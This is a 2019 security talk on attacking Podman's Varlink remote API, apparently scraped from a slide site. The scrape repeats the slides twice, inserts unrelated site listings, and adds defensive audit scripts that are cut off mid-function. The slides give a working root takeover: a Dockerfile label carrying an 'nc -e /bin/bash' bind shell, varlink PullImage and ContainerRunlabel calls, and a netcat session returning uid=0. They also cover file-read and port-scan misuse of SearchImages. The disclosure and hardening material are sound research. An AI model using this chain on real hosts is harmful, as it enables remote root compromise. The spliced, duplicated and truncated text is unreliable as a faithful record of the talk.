Adventures with Podman and Varlink
Jeremy Brown 10/2019
whoami
(No fancy title/bio today)
• ~decade in the industry
• @ Amazon, Microsoft, Nvidia playing offense, defense whatever … generally
trying to be effective across security domains as well as my own fun research
• Prior published research
• Bugs on many different platforms, clients, servers, drivers, virtual appliances,
cloud, fuzzing, generally exploring and thinking about how to break and/or fix
lots of different stuff, ….
References:
https://packetstormsecurity.com/files/author/6650/
https://www.slideshare.net/JeremyBrown37/presentations
whoami
ok ok if you must you can call me uh…
Senior CEO of Independent Research, Manager et al
Agenda
I. Podman? Varlink?
II. Local and remote attack surface
III. Some bugs and bad configurations
IV. Exploitation
V. Hardening
VI. Conclusion
“You get on the horn, I throw some peanuts at ‘em and we’ll be in Des Moines in no time….”
Reference: Tommy Boy (movie)
What is Varlink?
• Newer IPC protocol, implementation and toolset
• JSON based protocol for exchanging messages
• Meant to be an upgrade over D-Bus, BUS1, custom protocols over unix sockets, etc
• “plain-text, type-safe, discoverable, self-documenting, remotable, testable,
easy to debug… accessible from any programming environment”
• Not much security chatter on it
• But OSS-fuzz seems to have picked it up recently
References
https://varlink.org
https://github.com/systemd/systemd/tree/master/test/fuzz/fuzz-varlink
What is Varlink?
Reference: https://github.com/varlink/python
What is Varlink?
• A few different components and deployment scenarios
• Clients and services support for many different languages and system setups
• You can even set up a kernel driver and query it via a device node (/dev/org.kernel….stuff)
• It does a lot of stuff, but let’s focus on how it fits with Podman
• Podman integrated Varlink to provide its “remote API” functionality
Reference: http://www.projectatomic.io/blog/2018/05/podman-varlink/
What is Podman?
References:
https://www.podman.io
https://www.suse.com/c/podman-on-opensuse/
What is Podman?
• Lots of local podman commands map to varlink remote API methods
• https://github.com/containers/libpod/tree/master/cmd/podman
• https://github.com/containers/libpod/tree/master/pkg/varlinkapi
• Also not much public security research on it
• Only one CVE so far
• https://www.cvedetails.com/cve/CVE-2018-10856/
Reference: https://github.com/containers/libpod/
Together by default on Fedora Server
• Podman + Varlink installed out of the box instead of Docker
• Also rumored that RHEL8 will have Podman too
• RedHat and Fedora folks seem to really like it
• Remote services aren’t running by default AFAIK yet
• They can be configured to run in several ways, and some projects want or support
setups that listen over the network
Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf
Focus and !focus
• Focus
• Podman (1.4/1.5) + Varlink integration
• Remote APIs
• Local or remote privilege escalation on the HOST
• !focus
• Container escapes, although these are cool too
So how do I run this thing?
Reference: https://github.com/containers/libpod/issues/3344
Attack Surface
• podman local process running as root
• ACLs decide whether an unprivileged user can talk to it or not
But I was promised remote?
Attack Surface
• podman listening for connections on localhost or network
• Now that’s a remote API!
Now how do I talk to this thing?
Reference: https://github.com/containers/libpod/blob/master/cmd/podman/varlink/io.podman.varlink
Oh.
Or…
Attack Surface
• Code vs live query look
How do I test this thing?
• dnf install python3-varlink
References:
https://varlink.org/python/
https://blog.tomecek.net/post/recent-news-in-container-tech/
How do I test this thing?
Command line
Let’s look at the API docs
“You had me at hello”
Reference: https://github.com/containers/libpod/blob/master/API.md#ContainerRunlabel
Quick look @ images.go
Reference: https://github.com/containers/libpod/blob/ed3acaecbfeead3b0fef5928e47ecc9f34cd8d5b/utils/utils.go
Uh what’s a label?
Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html
Ok create a cool Dockerfile
FROM busybox
LABEL run="nc -l -p 10000 -e /bin/bash"
$ docker build -t imageX .
or other stuff for your reverse jazz…
References:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf
And setup a private docker registry to host it
$ docker-compose up
$ docker tag image localhost:5000/imageX
$ docker push localhost:5000/imageX
(edit /etc/containers/registries.conf for testing)
[registries.insecure]
registries = ['docker-registry:5000']
See if it works via command line
Wait… why root?
Oh, not that root I guess :’(
amicontained??
Additional reading: https://lwn.net/Articles/532593/
Unless it’s running as root
ami-not-so-contained??
So that means…
• Running podman as root
• You get root
• Running podman as rootless
• You get…. somebody 
So how about that remote API?
# podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000
DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000
DEBU[0000] Initializing boltdb state at
/var/lib/containers/storage/libpod/bolt_state.db
DEBU[0000] Using graph driver overlay
DEBU[0000] Using graph root /var/lib/containers/storage
…..
So how about that remote API?
$ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel
'{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}'
Check one thing real quick
Oh yeah we gotta Pull first
$ varlink call tcp:podman-host:6000/io.podman.PullImage '{"name":"docker-registry:5000/image3"}'
{
"reply": {
"id": "7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2",
"logs": [
"Copying blob sha256:ee153a04d6837058642958836062f20badf39f558be3e6c7c7773ef7d8301d90\n",
"Copying config sha256:7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2\n",
…..
$
Reference: https://github.com/containers/libpod/blob/master/API.md#PullImage
So how about that remote API?
(what we see server side)
…..
DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest"
DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…"
DEBU[0312] exporting opaque data as blob "sha256:7276ba03be37ab344f17a…."
All good ;-]
$ nc podman-host 10000
id
uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023
ls /root
anaconda-ks.cfg
original-ks.cfg
Now time for a quick recap
“DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH”
There is remote-client now (uses SSH) which makes this
easier & may become the standard way of doing things
Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md
Insecure configs
• Listen as privileged on an open ACL unix socket
• Eg. unix:/run/blah where access isn’t restricted
Local command execution
Reference: https://docs.rs/varlink/8.1.0/varlink/
Insecure configs
• Listen on loopback
• Eg. tcp:127.0.0.1:6000
Local command execution
Insecure configs
• Listen on network
• Eg. tcp:0.0.0.0:6000
Remote command execution
Podman is …. new
• Like 2017ish (?) new
• Similar introduction for Varlink actually
• We really don’t know how or where it will be deployed
• What weird secure or insecure ways admins will want to use it
• But there’s an opportunity to get security right before it takes off
And there’s an appetite for remote stuff
Reference: https://github.com/containers/libpod/issues/935
Are devs using it like this?
• Gopodman
• Podman Varlink API client in Go
• And it was built for this exact purpose
Reference: https://github.com/praveenkumar/gopodman
Gopodman
Reference: https://github.com/praveenkumar/gopodman
I can haz
Are there any docs telling you not to?
• Not that I know of :’)
• The Podman project should explicitly document and make known the risk that the
remote API over plain TCP is insecure, especially given the set of APIs
available
• Hopefully this research will make a positive impact
What about SSH?
• It does provide advantages over plain Varlink over TCP such as
encrypted connections, built-in auth gateway, etc
• There’s some docs on how to use it… “securely” (?)
Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html
Varlink bridge mode
• Bridge + SSH auth > running it over TCP /w no auth
• But not everyone is doing it this way
Reference: https://varlink.org/FAQ.html
And Varlink isn’t in the business of auth
Reference: https://varlink.org/FAQ.html
Return of Remote API: Trivial API crashes
• These would be remote DoS of podman, and some may still work in current releases
Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash
Interesting APIs
• Here’s a few that made the list
• ImportImage(), LoadImage(), RemoveImage(), SearchImages()
• Also some need an “upgraded connection”
• Attach(), SendFile(), ReceiveFile(), etc
• Probably some fun stuff to do there
Reference: https://varlink.org/FAQ.html
So we can also do stuff like this
We can manipulate server URL requests
via SearchImages()
Even better…
• By appending ‘/’ onto search queries, it parses this to mean we’re
talking to a registry
• And after best effort concatenations….
Let’s try some stuff
> dir traversal for arbitrary cert
consumption
> get server to read arbitrary
local files
> internal/external port scan
Lots of… other code
• Actually part of the code being executed here is in a different project
• https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclientconfig.go#L20
• https://github.com/containers/libpod/blob/master/pkg/registries/registries.go
attack surface++
So like various blind file reads, port scan, etc
• Undesired behavior for sure… but more like white elephant bugs
without a full exploit chain
More stuff?
• Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)
More stuff?
• Panic due to likely trying to operate on data that isn’t there
• Simple empty or missing ‘name’ parameter, or invalid name, etc…
• Other variants too, kinda hard to not crash the server using this API
More Stuff?
Doesn’t check if strings in volume array
are empty or if they match exactly?
Maybe some more API tests or ???
Testing these issues
$ sudo dnf install -t python3-podman-api
(or python3-varlink works too)
• But doesn’t support every single API that we need
“Live”
• We can capture with socat to save the raw API call and then replay it
$ socat TCP-LISTEN:7000 TCP:localhost:6000
{"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image":
"docker-registry:5000/image3","label":"run"}}}
^^ and then just send it over a regular socket + NULL byte (per spec)
“Live”
pickletime.py
Sharing this data with folks
• Took a little time to find the right people to talk to about the bugs
• Now there is a documented security@ email DL for security comms, but I was
advised to send the details to RedHat directly
• Initial response re: the runlabel API was that they believed it was working as
designed….
• Yes, but when you expose the remote API w/o auth it works unintendedly very well for everyone 
• Expecting some more bug fixes for the API issues and updated docs
and/or runtime flags to mitigate the risks of an insecure remote API setup
• At least one crash already fixed in 1.5.1
Discovery
• Look for UNIX sockets you can connect to with Varlink client
$ lsof -U
• Look for loopback or network services that speak the protocol
$ echo -e "{}\0" | nc localhost 6000
{"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParameter"}
Discovery
$ varlink info tcp:podman-host:6000
Vendor: Atomic
Product: podman
Version: 1.5.1
URL: https://github.com/containers/libpod
Interfaces:
org.varlink.service
io.podman
Discovery
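As an added example (not from the slides or the Podman project), the two discovery checks above plus the socket-side advice on the hardening slides as one small Python audit script: it speaks the Varlink wire format itself (JSON object + NUL byte) so it needs no varlink package, calls org.varlink.service.GetInfo the way `varlink info` does, and flags an exposed io.podman interface or a loosely permissioned unix socket. Host, port and socket paths are whatever you point it at; the GetInfo reply shown in the comments is constructed from the slide output.

```python
import json
import os
import socket
import stat
import sys

# Varlink framing (https://varlink.org): one JSON object per message,
# terminated by a single NUL byte, which is what `echo -e "{}\0" | nc` sends by hand.
NUL = b"\x00"
GET_INFO = "org.varlink.service.GetInfo"
LOOPBACK = ("127.0.0.1", "::1", "localhost")


def encode_call(method, parameters=None):
    """Serialize one Varlink call as compact JSON plus the NUL terminator."""
    msg = {"method": method}
    if parameters:
        msg["parameters"] = parameters
    return json.dumps(msg, separators=(",", ":")).encode() + NUL


def decode_messages(buf):
    """Split a NUL-delimited byte buffer into parsed messages.

    Returns (messages, leftover): leftover is an incomplete trailing frame
    the caller should prepend to the next recv() before decoding again.
    """
    messages = []
    while NUL in buf:
        frame, buf = buf.split(NUL, 1)
        messages.append(json.loads(frame.decode()))
    return messages, buf


def probe_tcp(host, port, timeout=3.0):
    """Send GetInfo to a tcp:host:port Varlink listener and return the first reply.

    Same call `varlink info tcp:host:port` makes; done by hand so the audit box
    needs no client package. Returns {} if the peer closes without answering.
    """
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_call(GET_INFO))
        while NUL not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    messages, _ = decode_messages(buf)
    return messages[0] if messages else {}


def assess_info(reply, bind_addr):
    """Turn a GetInfo reply into findings; an empty list means nothing to flag.

    Constructed reply from the slide:
    {"parameters":{"vendor":"Atomic","product":"podman","version":"1.5.1",
     "url":"https://github.com/containers/libpod",
     "interfaces":["org.varlink.service","io.podman"]}}
    """
    if "error" in reply:
        # e.g. org.varlink.service.InvalidParameter: it speaks Varlink, the call just failed
        return ["varlink error %s: service speaks the protocol but GetInfo failed" % reply["error"]]
    params = reply.get("parameters", {})
    if "io.podman" not in params.get("interfaces", []):
        return []
    findings = ["io.podman interface exposed (%s %s)"
                % (params.get("product", "?"), params.get("version", "?"))]
    if bind_addr in LOOPBACK:
        findings.append("bound to loopback: any local user can call the API (local command execution)")
    else:
        findings.append("bound to %s: reachable over the network with no auth (remote command execution)"
                        % bind_addr)
    return findings


def assess_unix_socket(path, mode, uid, gid):
    """Check a Varlink unix socket's mode, owner and location against the hardening advice."""
    if not stat.S_ISSOCK(mode):
        return ["%s: not a socket" % path]
    findings = []
    perm = mode & 0o777
    if perm & stat.S_IWOTH:
        findings.append("%s: world-writable (mode %o), any local user can connect" % (path, perm))
    elif perm & stat.S_IWGRP:
        findings.append("%s: group-writable (mode %o), gid %d can connect" % (path, perm, gid))
    if not path.startswith("/run/"):
        findings.append("%s: outside /run (e.g. /tmp), a less locked-down directory" % path)
    if uid == 0 and findings:
        findings.append("%s: owned by root, so an exposed socket means root-level API access" % path)
    return findings


def audit_unix_socket(path):
    """stat() a real socket path and assess it."""
    st = os.stat(path)
    return assess_unix_socket(path, st.st_mode, st.st_uid, st.st_gid)


if __name__ == "__main__":
    # usage: varlink_audit.py tcp HOST PORT   |   varlink_audit.py unix /run/some.socket
    if sys.argv[1] == "tcp":
        reply = probe_tcp(sys.argv[2], int(sys.argv[3]))
        print("\n".join(assess_info(reply, sys.argv[2])) or "no io.podman interface found")
    else:
        print("\n".join(audit_unix_socket(sys.argv[2])) or "socket looks locked down")
```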
Hardening
• ACLs
• Choose mode appropriately on registration (the more restrictive the better)
• Choose the more locked down /run directory vs others less so (not /tmp)
• Privileges
• Run services (or even the resolver service) as lower-privileged users if possible (instead of root)
• If not rootless, drop privileges when doing serious stuff with APIs
Hardening
• Remote access
• Do not run Podman over native Varlink using only TCP
• Use SSH (key + password) related methods to protect the connection and
provide auth so not just anyone can pwn ‘n own
• Understand that even /w remote auth, local users may still be able to hit APIs
• Try to always run rootless to mitigate impact of bugs
Conclusion
• Varlink and Podman are still pretty new and need more research
• Security maturity will come with time, hardening efforts and more audits
• Code to test the found issues to be released shortly
• Things can only get better
• For now, if you’re building systems with them, remember to isolate + auth
• More fixes and better security documentation to come
• https://github.com/containers/libpod/commits/master
Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd
FIN
Questions?
jbrown3264 + gmail = com

 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 

Adventures with Podman and Varlink

9. What is Podman?
• Lots of local podman commands map to varlink remote API methods
• https://github.com/containers/libpod/tree/master/cmd/podman
• https://github.com/containers/libpod/tree/master/pkg/varlinkapi
• Also not much public security research on it
• Only (1) CVE so far
• https://www.cvedetails.com/cve/CVE-2018-10856/
Reference: https://github.com/containers/libpod/

11. Together by default on Fedora Server
• Podman + Varlink installed out of the box instead of Docker
• Also rumored that RHEL8 will have Podman too
• RedHat and Fedora folks seem to really like it
• Remote services aren't running by default AFAIK yet
• They can be configured to run in different ways, and some projects want or support listening-over-the-network setups
Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf

12. Focus and !focus
• Focus
  • Podman (1.4/1.5) + Varlink integration
  • Remote APIs
  • Local or remote privilege escalation on the HOST
• !focus
  • Container escapes, although these are cool too

13. So how do I run this thing?
Reference: https://github.com/containers/libpod/issues/3344

14. Attack Surface
• podman local process running as root
• ACLs say whether an unprivileged user can talk to it or not

15. But I was promised remote?

16. Attack Surface
• podman listening for connections on localhost or the network
• Now that's a remote API!

17. Now how do I talk to this thing?
Reference: https://github.com/containers/libpod/blob/master/cmd/podman/varlink/io.podman.varlink

18. Oh.

19. Or…

20. Attack Surface
• Code vs live query look

21. How do I test this thing?
• dnf install python3-varlink
References:
https://varlink.org/python/
https://blog.tomecek.net/post/recent-news-in-container-tech/

22. How do I test this thing?
Command line

23. Let's look at the API docs
"You had me at hello"
Reference: https://github.com/containers/libpod/blob/master/API.md#ContainerRunlabel

24. Quick look @ images.go
Reference: https://github.com/containers/libpod/blob/ed3acaecbfeead3b0fef5928e47ecc9f34cd8d5b/utils/utils.go

25. Uh what's a label?
Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html

26. Ok create a cool Dockerfile
FROM busybox
LABEL run="nc -l -p 10000 -e /bin/bash"
$ docker build -t imageX .
or other stuff for your reverse jazz…
References:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf

27. And set up a private docker registry to host it
$ docker-compose up
$ docker tag image localhost:5000/imageX
$ docker push localhost:5000/imageX
(edit /etc/containers/registries.conf for testing)
[registries.insecure]
registries = ['docker-registry:5000']

28. See if it works via command line

30. Oh, not that root I guess :'(
amicontained??
Additional reading: https://lwn.net/Articles/532593/

31. Unless it's running as root
ami-not-so-contained??

32. So that means…
• Running podman as root
  • You get root
• Running podman as rootless
  • You get…. somebody

33. So how about that remote API?
# podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000
DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000
DEBU[0000] Initializing boltdb state at /var/lib/containers/storage/libpod/bolt_state.db
DEBU[0000] Using graph driver overlay
DEBU[0000] Using graph root /var/lib/containers/storage
…..

34. So how about that remote API?
$ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel '{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}'

35. Check one thing real quick

36. Oh yeah we gotta Pull first
$ varlink call tcp:podman-host:6000/io.podman.PullImage '{"name":"docker-registry:5000/image3"}'
{
  "reply": {
    "id": "7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2",
    "logs": [
      "Copying blob sha256:ee153a04d6837058642958836062f20badf39f558be3e6c7c7773ef7d8301d90\n",
      "Copying config sha256:7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2\n",
…..
$
Reference: https://github.com/containers/libpod/blob/master/API.md#PullImage

37. So how about that remote API? (what we see server side)
…..
DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest"
DEBU[0312] parsed reference into "[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…"
DEBU[0312] exporting opaque data as blob "sha256:7276ba03be37ab344f17a…."

38. All good ;-]
$ nc podman-host 10000
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023
ls /root
anaconda-ks.cfg
original-ks.cfg

39. Now time for a quick recap
"DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH"
There is remote-client now (uses SSH), which makes this easier & may become the standard way of doing things
Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md

40. Insecure configs
• Listen as privileged on an open-ACL unix socket
• E.g. unix:/run/blah where access isn't restricted
Local command execution
Reference: https://docs.rs/varlink/8.1.0/varlink/

41. Insecure configs
• Listen on loopback
• E.g. tcp:127.0.0.1:6000
Local command execution

42. Insecure configs
• Listen on the network
• E.g. tcp:0.0.0.0:6000
Remote command execution

43. Podman is …. new
• Like 2017ish (?) new
• Similar introduction for Varlink actually
• We really don't know how or where it will be deployed
• What weird secure or insecure ways admins will want to use it
• But there's an opportunity to get security right before it takes off

44. And there's an appetite for remote stuff
Reference: https://github.com/containers/libpod/issues/935

45. Are devs using it like this?
• Gopodman
• Podman Varlink API client in Go
• And it was built for this exact purpose
Reference: https://github.com/praveenkumar/gopodman

49. Are there any docs telling you not to?
• Not that I know of :')
• The Podman project should explicitly document and make known the risk that the remote API over plain TCP is insecure, especially given the set of APIs available
• Hopefully this research will make a positive impact

50. What about SSH?
• It does provide advantages over plain Varlink over TCP, such as encrypted connections, a built-in auth gateway, etc
• There's some docs on how to use it… "securely" (?)
Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html

51. Varlink bridge mode
• Bridge + SSH auth > running it over TCP /w no auth
• But not everyone is doing it this way
Reference: https://varlink.org/FAQ.html

52. And Varlink isn't in the business of auth
Reference: https://varlink.org/FAQ.html

53. Return of Remote API: Trivial API crashes
• Would be remote DoS of podman & some may still work in releases
Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash

54. Interesting APIs
• Here are a few that made the list
• ImportImage(), LoadImage(), RemoveImage(), SearchImages()
• Also some need an "upgraded connection"
• Attach(), SendFile(), ReceiveFile(), etc
• Probably some fun stuff to do there
Reference: https://varlink.org/FAQ.html

55. So we can also do stuff like this

56. We can manipulate server URL requests via SearchImages()

57. Even better…
• By appending '/' onto search queries, it parses this to mean we're talking to a registry
• And after best-effort concatenations….

58. Let's try some stuff
> dir traversal for arbitrary cert consumption
> get server to read arbitrary local files
> internal/external port scan

59. Lots of… other code
• Actually part of the code being executed here is in a different project
• https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclientconfig.go#L20
• https://github.com/containers/libpod/blob/master/pkg/registries/registries.go
attack surface++

60. So like various blind file reads, port scan, etc
• Undesired behavior for sure… but more like white elephant bugs without a full exploit chain

61. More stuff?
• Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)

62. More stuff?
• Panic due to likely trying to operate on data that isn't there
• Simple empty or missing 'name' parameter, or invalid name, etc…
• Other variants too, kinda hard to not crash the server using this API

63. More Stuff?
Doesn't check if strings in the volume array are empty or if they match exactly?

64. Maybe some more API tests or ???

65. Testing these issues
$ sudo dnf install -t python3-podman-api
(or python3-varlink works too)
• But it doesn't support every single API that we need

67. "Live"
• We can capture with socat to save the raw API call and then replay it
$ socat TCP-LISTEN:7000 TCP:localhost:6000
{"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image":"docker-registry:5000/image3","label":"run"}}}
^^ and then just send it over a regular socket + NULL byte (per spec)

69. Sharing this data with folks
• Took a little time to find the right people to talk to about the bugs
• Now there is a documented security@ email DL for security comms, but I was recommended to send the details to RedHat directly
• Initial response re: run label API was that they believed it was working as it was designed….
• Yes, but when you run the Remote API w/o auth it works unintendedly very well for everyone
• Expecting some more bug fixes for the API issues and updated docs and/or runtime flags to mitigate the risks of an insecure Remote API setup
• At least one crash already fixed in 1.5.1

70. Discovery
• Look for UNIX sockets you can connect to with a Varlink client
$ lsof -U
• Look for loopback or network services that speak the protocol
$ echo -e "{}\0" | nc localhost 6000
{"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParameter"}

71. Discovery
$ varlink info tcp:podman-host:6000
Vendor: Atomic
Product: podman
Version: 1.5.1
URL: https://github.com/containers/libpod
Interfaces:
  org.varlink.service
  io.podman
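The two discovery checks above (the bare `{}` probe on slide 70 and `varlink info` on slide 71) both rest on the same wire format: one JSON object per message, terminated by a NUL byte. The following is an added example, not code from the talk, varlink or libpod, that implements that format with only the Python standard library so a host owner can inventory which ports and sockets answer as a Varlink service and whether they expose io.podman. The sample replies are constructed to match the output shown on the slides; the socketpair demo stands in for a real service so the whole thing runs offline.

```python
"""Minimal Varlink wire-format client for inventorying Varlink services on hosts you
administer. Added example: not code from the talk, varlink or libpod; uses only the
standard library and the address/reply shapes shown on the slides."""
import json
import socket

# Varlink frames one JSON object per message and terminates it with a single NUL byte.
NUL = b"\x00"

# Constructed sample replies shaped like the output on slides 70 and 71.
SAMPLE_PROBE_ERROR = (b'{"parameters":{"parameter":"method"},'
                      b'"error":"org.varlink.service.InvalidParameter"}' + NUL)
SAMPLE_GETINFO = (b'{"parameters":{"vendor":"Atomic","product":"podman","version":"1.5.1",'
                  b'"url":"https://github.com/containers/libpod",'
                  b'"interfaces":["org.varlink.service","io.podman"]}}' + NUL)


def encode_call(method, parameters=None):
    """Serialize one call: {"method": ..., "parameters": ...} plus the NUL terminator."""
    msg = {"method": method}
    if parameters is not None:
        msg["parameters"] = parameters
    return json.dumps(msg).encode("utf-8") + NUL


def split_messages(buf):
    """Split raw bytes into complete NUL-terminated messages; the second element is the
    unterminated remainder (possibly empty)."""
    parts = buf.split(NUL)
    return parts[:-1], parts[-1]


def summarize_reply(raw):
    """Classify one raw reply (without its NUL). A JSON object carrying 'parameters' or
    'error' speaks Varlink; that includes the InvalidParameter error the bare '{}'
    probe triggers. For a GetInfo reply also pull out product, version and whether the
    io.podman interface is exposed."""
    summary = {"speaks_varlink": False, "product": None, "version": None,
               "interfaces": [], "exposes_podman": False, "error": None}
    try:
        reply = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return summary
    if not isinstance(reply, dict) or not any(k in reply for k in ("parameters", "error")):
        return summary
    summary["speaks_varlink"] = True
    summary["error"] = reply.get("error")
    params = reply.get("parameters") or {}
    summary["product"] = params.get("product")
    summary["version"] = params.get("version")
    summary["interfaces"] = list(params.get("interfaces") or [])
    summary["exposes_podman"] = "io.podman" in summary["interfaces"]
    return summary


def get_info_over_socket(sock, timeout=5.0):
    """Send org.varlink.service.GetInfo on a connected socket (unix or tcp) and summarize
    the first complete reply."""
    sock.settimeout(timeout)
    sock.sendall(encode_call("org.varlink.service.GetInfo"))
    buf = b""
    while NUL not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    msgs, rest = split_messages(buf)
    return summarize_reply(msgs[0] if msgs else rest)


def audit_tcp(host, port):
    """Connect to host:port on a host you administer and report what answers there."""
    with socket.create_connection((host, port), timeout=5.0) as sock:
        return get_info_over_socket(sock)


def demo_socketpair():
    """Offline demonstration: the peer end of a socketpair plays a Podman Varlink
    service that answers GetInfo with the constructed reply."""
    client, service = socket.socketpair()
    try:
        service.sendall(SAMPLE_GETINFO)  # reply is queued before the call is even read
        return get_info_over_socket(client)
    finally:
        client.close()
        service.close()


if __name__ == "__main__":
    for raw in (SAMPLE_PROBE_ERROR, SAMPLE_GETINFO, b"HTTP/1.1 400 Bad Request\r\n"):
        msgs, rest = split_messages(raw)
        print(summarize_reply(msgs[0] if msgs else rest))
    print(demo_socketpair())
```

Against a real listener, `audit_tcp("podman-host", 6000)` returns the same dictionary `demo_socketpair()` produces here; a `speaks_varlink` result with `exposes_podman` set on a TCP port is exactly the unauthenticated remote API the talk warns about.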
73. Hardening
• ACLs
  • Choose the mode appropriately on registration (the more restrictive the better)
  • Choose the more locked-down /run directory over others that are less so (not /tmp)
• Privileges
  • Run services (or even the resolver service) as lower-privileged users if possible (instead of root)
  • If not rootless, drop privileges when doing serious stuff with APIs

74. Hardening
• Remote access
  • Do not run Podman over native Varlink using only TCP
  • Use SSH (key + password) related methods to protect the connection and provide auth so not just anyone can pwn 'n own
  • Understand that even /w remote auth, local users may still be able to hit APIs
  • Try to always run rootless to mitigate the impact of bugs
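The insecure-config slides (40 to 42) and the hardening slides (73 and 74) describe the same decision table: what a Varlink listener address and, for unix sockets, its mode and owner say about who can call io.podman. The following is an added example, not code from the talk, libpod or varlink, that turns that table into an audit check. It assumes the address syntax used on the slides (`unix:PATH` and `tcp:HOST:PORT`); the socket paths in the sample list are illustrative, and the temp-socket demo is there only so the live `os.stat` path runs offline.

```python
"""Audit Podman Varlink listener configurations against the talk's hardening advice.
Added example, not code from libpod or varlink; assumes the address syntax the slides
use (unix:PATH and tcp:HOST:PORT)."""
import ipaddress
import os
import socket
import stat
import tempfile


def _is_loopback(host):
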